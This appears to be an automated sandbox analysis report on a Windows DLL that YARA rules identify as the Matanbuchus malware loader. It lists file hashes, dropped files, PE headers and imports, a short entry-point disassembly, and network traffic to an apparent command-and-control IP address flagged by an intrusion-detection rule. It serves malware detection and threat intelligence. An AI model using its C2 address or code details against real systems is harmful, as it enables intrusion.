                MD5:8D20E81B52A7F98E1AF799E1C5DB99EB
                SHA1:EB8CE4FE3C48BF0299245D9CCDDEAC52A9E6B757
                SHA-256:8690B6A5BD29D4CEA39CB5327217498CD5A8BE8E26CE9FA243E2CEF2690A53A7
                SHA-512:4D32F19897005FFF3801FF96AA827D2D50E06958E0AA55423E2606878471690CCDC25F187B6216752B956019C9C5DA2E41FB34D7751BE04D9D68C639FC4F348C
                Malicious:false
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.4.<./.P.i.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4666
                Entropy (8bit):4.483304833009695
                Encrypted:false
                SSDEEP:48:cvIwWl8zs8Jg77aI90nWpW8VYj5Ym8M4JCdPi6Fc+q8/qV1CGScSeMd:uIjf6I72W7VVJh/T1CJ37d
                MD5:61B21A4931E9D2651D3D3C4C5768752E
                SHA1:70A3D0D0185852E985BF83622D6C15FAB6E6C474
                SHA-256:837B2BC65BC2B780D51FCDE173C304AFCB996C3CD4AB13937073C7366085735A
                SHA-512:C3E4887DD7BA1927446A3DFCCC70155C0CEA40FF73039A8AF350DD4F1C8DA32DE77271801D44782A089F67076C794D2E176D269C7EE0C3A5694E2D1736E16A10
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="519384" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Windows\SysWOW64\rundll32.exe
                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):932352
                Entropy (8bit):6.695206735519429
                Encrypted:false
                SSDEEP:24576:lLaUDWCxeIacvy1wf0nWtq3f2PeIm/DEhbgD1yhr4+1zDw4bDz:lLtDWCxeIaYy+f1E3OPeImrEtgDchr46
                MD5:E6092582959219117440FBDD77D2CC53
                SHA1:2722F891BF534E763B5B742B7E5ECE905AB35137
                SHA-256:7F66770624E2D4BD51029A71CF7311CB873EE6FFF6A694E4235577D0322A9937
                SHA-512:CC3AF1232ECA53509171688A8DF4E242D28CD25213580CFDE357BA6C8E6D1408D25C50847CF835DB53FEFF175BEB3A0CC32E98C35FDA71C0291FF62ECBD0F2CD
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\8f08\user-PC\user-PC.ocx, Author: Joe Security
                • Rule: Windows_Trojan_Matanbuchus_58a61aaa, Description: unknown, Source: C:\Users\user\8f08\user-PC\user-PC.ocx, Author: unknown
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 18%
                • Antivirus: Virustotal, Detection: 27%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y}Bx..Bx..Bx...../Hx...../.x...../Vx..D../\x..D../Rx..D../Vx...../Ix..Bx...x..(../@x..(../Cx..(../Cx..RichBx..........................PE..L......f.........."!...&.....$`.....K*.......................................0k...........@......................... ...........x.............................j.\....E...............................D..@............................................text............................... ..`.rdata...;.......<..................@..@.data...t.\..0......................@....reloc..\.....j......&..............@..B........................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:modified
                Size (bytes):2464
                Entropy (8bit):3.244504060920273
                Encrypted:false
                SSDEEP:24:QOaqdmuF3rX1H+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPVm:FaqdF7X1H+AAHdKoqKFxcxkFN1d
                MD5:BD0061EC9FD759F1A2CB47E43FB70658
                SHA1:5A3E55508CE7B5030D9276D936D8247FD8F4A6B2
                SHA-256:24B095153C0C7383A7BDFD94ADBD88F558A1558688243BDE0D184D3BA7CB60CD
                SHA-512:FD8641AABA876D06B1CF5A69E7DDE592E3222416972E9D8B3336720C32BD8065C0DBDB975746EDE592BF7DD32FD86511989F2370D3F7A16218AAB25A872ACE0E
                Malicious:false
                Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. S.e.p. .. 2.7. .. 2.0.2.4. .2.3.:.0.4.:.5.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:MS Windows registry file, NT/2000 or above
                Category:dropped
                Size (bytes):1835008
                Entropy (8bit):4.4174599376702
                Encrypted:false
                SSDEEP:6144:Tcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNo5+:Ii58oSWIZBk2MM6AFBWo
                MD5:098130D86602351DC667C27FC630AD15
                SHA1:A405694FB5C0C3B0899C6774499119BA1EB16E03
                SHA-256:93CB16B2E7D26A1F1D8A9D478B43470F19623B06BEFD2903D770720A61EF1C6E
                SHA-512:9CA005FE4F3CD683092DEF1435A3FD0A9FD2B0C6951D223DD93CE7A3987A4BBD85FBB785977FEF7E0F0DE35CE39598C6A4A07AA858A0390F286B54DA6FF1D60A
                Malicious:false
                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.W..D...............................................................................................................................................................................................................................................................................................................................................l...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                Entropy (8bit):6.695206735519429
                TrID:
                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                • Generic Win/DOS Executable (2004/3) 0.20%
                • DOS Executable Generic (2002/1) 0.20%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:useraccount.aspx.dll
                File size:932'352 bytes
                MD5:e6092582959219117440fbdd77d2cc53
                SHA1:2722f891bf534e763b5b742b7e5ece905ab35137
                SHA256:7f66770624e2d4bd51029a71cf7311cb873ee6fff6a694e4235577d0322a9937
                SHA512:cc3af1232eca53509171688a8df4e242d28cd25213580cfde357ba6c8e6d1408d25c50847cf835db53feff175beb3a0cc32e98c35fda71c0291ff62ecbd0f2cd
                SSDEEP:24576:lLaUDWCxeIacvy1wf0nWtq3f2PeIm/DEhbgD1yhr4+1zDw4bDz:lLtDWCxeIaYy+f1E3OPeImrEtgDchr46
                TLSH:01153A19F942E718D8A68138B611EAEB159D393112570C83F9D17FCE3D58AF19AB2F03
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y}Bx..Bx..Bx...../Hx...../.x...../Vx..D../\x..D../Rx..D../Vx...../Ix..Bx...x..(../@x..(../Cx..(../Cx..RichBx.................
                Icon Hash:7ae282899bbab082
                Entrypoint:0x100a2a4b
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x10000000
                Subsystem:windows cui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                DLL Characteristics:DYNAMIC_BASE
                Time Stamp:0x66C797B3 [Thu Aug 22 19:55:31 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:6
                OS Version Minor:0
                File Version Major:6
                File Version Minor:0
                Subsystem Version Major:6
                Subsystem Version Minor:0
                Import Hash:2a436809b709aeaf681e453703a73cdc
                Instruction
                push ebp
                mov ebp, esp
                cmp dword ptr [ebp+0Ch], 01h
                jne 00007F69E44AEFF7h
                call 00007F69E44AF3A1h
                push dword ptr [ebp+10h]
                push dword ptr [ebp+0Ch]
                push dword ptr [ebp+08h]
                call 00007F69E44AEEA3h
                add esp, 0Ch
                pop ebp
                retn 000Ch
                push ebp
                mov ebp, esp
                and dword ptr [1069F97Ch], 00000000h
                sub esp, 24h
                or dword ptr [100D3340h], 01h
                push 0000000Ah
                call dword ptr [100AF118h]
                test eax, eax
                je 00007F69E44AF1A2h
                and dword ptr [ebp-10h], 00000000h
                xor eax, eax
                push ebx
                push esi
                push edi
                xor ecx, ecx
                lea edi, dword ptr [ebp-24h]
                push ebx
                cpuid
                mov esi, ebx
                pop ebx
                nop
                mov dword ptr [edi], eax
                mov dword ptr [edi+04h], esi
                mov dword ptr [edi+08h], ecx
                xor ecx, ecx
                mov dword ptr [edi+0Ch], edx
                mov eax, dword ptr [ebp-24h]
                mov edi, dword ptr [ebp-20h]
                mov dword ptr [ebp-0Ch], eax
                xor edi, 756E6547h
                mov eax, dword ptr [ebp-18h]
                xor eax, 49656E69h
                mov dword ptr [ebp-04h], eax
                mov eax, dword ptr [ebp-1Ch]
                xor eax, 6C65746Eh
                mov dword ptr [ebp-08h], eax
                xor eax, eax
                inc eax
                push ebx
                cpuid
                mov esi, ebx
                pop ebx
                nop
                lea ebx, dword ptr [ebp-24h]
                mov dword ptr [ebx], eax
                mov eax, dword ptr [ebp-04h]
                or eax, dword ptr [ebp-08h]
                or eax, edi
                mov dword ptr [ebx+04h], esi
                mov dword ptr [ebx+08h], ecx
                mov dword ptr [ebx+0Ch], edx
                jne 00007F69E44AF035h
                mov eax, dword ptr [ebp-24h]
                and eax, 0FFF3FF0h
                cmp eax, 000106C0h
                je 00007F69E44AF015h
                cmp eax, 00020660h
                je 00007F69E44AF00Eh
                cmp eax, 00000070h
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0xd1e200x19c.rdata
                IMAGE_DIRECTORY_ENTRY_IMPORT0xd1fbc0x78.rdata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x6a10000x1125c.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0xb45800x1c.rdata
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb44c00x40.rdata
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0xaf0000x214.rdata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000xad77f0xad800e7cf0fde646d0779fadc2e386b6b70caFalse0.5104396501260807data6.465386563142831IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rdata0xaf0000x23b9e0x23c00a2076708c45ac9cba66919a229210515False0.39360249125874125data5.969714617646423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .data0xd30000x5cd3740xe00e5d6c8b96ab549b3f0e5faf89949ea06unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .reloc0x6a10000x1125c0x11400fa8e7c9cde049a2738cc6c3566fa1b50False0.7442396965579711data6.832661206798216IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                DLLImport
                KERNEL32.dllGetLastError, SetLastError, HeapAlloc, HeapReAlloc, GetProcessHeap, GetCurrentProcessId, ExitProcess, GetCurrentThread, GetCurrentThreadId, CreateProcessW, GetCurrentProcessorNumber, GetTickCount, GetWindowsDirectoryW, GetLargePageMinimum, GetModuleHandleA, lstrlenA, lstrlenW, IsBadReadPtr, IsValidCodePage, GetACP, GetSystemDefaultUILanguage, GetSystemDefaultLangID, GetSystemDefaultLCID, GetThreadUILanguage, GetCommandLineA, GetOEMCP, WriteConsoleW, CreateFileW, SetFilePointerEx, GetConsoleMode, CloseHandle, WriteFile, FlushFileBuffers, SetStdHandle, HeapSize, GetStringTypeW, GetFileType, GetStdHandle, LCMapStringW, FreeEnvironmentStringsW, GetEnvironmentStringsW, WideCharToMultiByte, MultiByteToWideChar, GetCommandLineW, GetCPInfo, FindNextFileW, FindFirstFileExW, FindClose, HeapFree, GetModuleFileNameW, GetModuleHandleExW, RaiseException, LoadLibraryExW, GetProcAddress, FreeLibrary, TlsFree, TlsSetValue, GetEnvironmentStrings, SetEnvironmentVariableW, GetEnvironmentVariableW, GetConsoleOutputCP, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, InterlockedFlushSList, EncodePointer, EnterCriticalSection, DecodePointer
                USER32.dllGetDialogBaseUnits, ArrangeIconicWindows, GetLastActivePopup, GetTopWindow, GetShellWindow, GetParent, GetDesktopWindow, GetCaretBlinkTime, GetCursor, GetCursorPos, GetWindowTextLengthA, GetUpdateRect, EndPaint, BeginPaint, GetWindowDC, GetForegroundWindow, EndMenu, DestroyMenu, GetSystemMenu, GetMenu, IsWindowEnabled, IsWindowUnicode, GetCapture, GetFocus, GetActiveWindow, GetDlgCtrlID, IsZoomed, AnyPopup, IsIconic, IsWindowVisible, EndDeferWindowPos, BeginDeferWindowPos, OpenIcon, IsWindow, GetDoubleClickTime, GetMessageExtraInfo, GetMessageTime, GetMessagePos, wsprintfW, GetSubMenu
                ADVAPI32.dllRegSetValueExW, RegCreateKeyExW, RegCloseKey
                SHELL32.dllSHCreateDirectoryExW
                SHLWAPI.dllStrCmpIW, PathAppendW
                NameOrdinalAddress
                DllInit10x100a2040
                DllInitialize20x100a2060
                DllInstall30x1005d4d0
                DllUninitialize40x10066300
                Export50x100663a0
                ExportDll60x100a20c0
                Init70x100a2160
                Main80x100663c0
                ThreadFunction90x10066430
                Uninitialize100x1006c680
                UnregisterDll110x1006c700
                _Uninitialize120x100a2190
                curl_easy_cleanup130x1006c730
                curl_easy_init140x1006eed0
                curl_easy_perform150x1006f4d0
                curl_easy_setopt160x100715b0
                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                2024-09-28T03:22:29.055319+02002034468ET MALWARE Matanbuchus Loader CnC M31192.168.2.749710194.67.193.124433TCP
                TimestampSource PortDest PortSource IPDest IP
                Sep 28, 2024 03:22:05.680083036 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:05.680130005 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:05.680213928 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:05.702482939 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:05.702497959 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:06.431571960 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:06.431946039 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:06.492737055 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:06.492763042 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:06.493354082 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:06.493436098 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:06.497467041 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:06.539419889 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:06.859618902 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:06.859656096 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:06.859916925 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:06.859934092 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:06.860014915 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.023757935 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.023791075 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.023999929 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.024020910 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.024173975 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.025137901 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.025158882 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.025263071 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.025290012 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.025456905 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.151026011 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.151094913 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.151202917 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.151221991 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.151278973 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.276417017 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.276473045 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.276591063 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.276611090 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.276654959 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.277470112 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.277506113 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.277558088 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.277565002 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.277652025 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.403366089 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.403407097 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.403532982 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.403557062 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.403608084 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.404602051 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.404628038 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.404705048 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.404712915 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.404778004 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.405572891 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.405600071 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.405669928 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.405678034 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.405719042 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.530515909 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.530548096 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.530684948 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.530709982 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.530761957 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.531023026 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.531047106 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.531107903 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.531115055 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.531148911 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.531191111 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.531208992 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.531270027 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.531276941 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.531361103 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.532655001 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.532681942 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.532740116 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.532747030 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.532779932 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.656375885 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.656384945 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.656498909 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.656523943 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.656563044 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.657109976 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.657149076 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.657186031 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.657192945 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.657243013 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.657619953 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.657644033 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.657723904 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.657730103 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.657768965 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.658454895 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.658476114 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.658550024 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.658555984 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.658606052 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.782563925 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.782593966 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.782660007 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.782682896 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.782704115 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.782773018 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.783171892 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.783186913 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.783241034 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.783250093 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.783293009 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.783654928 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.783675909 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.783708096 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.783716917 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.783763885 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.787477970 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.787494898 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.787559986 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.787571907 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.787612915 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.787935019 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.787949085 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.788023949 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.788029909 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.788072109 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.788089991 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.788360119 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.788373947 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.788434029 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.788439989 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.788477898 CEST49700443192.168.2.7194.67.193.13
                Sep 28, 2024 03:22:07.908978939 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909003973 CEST44349700194.67.193.13192.168.2.7
                Sep 28, 2024 03:22:07.909101963 CEST49700443192.168.2.7194.67.193.13
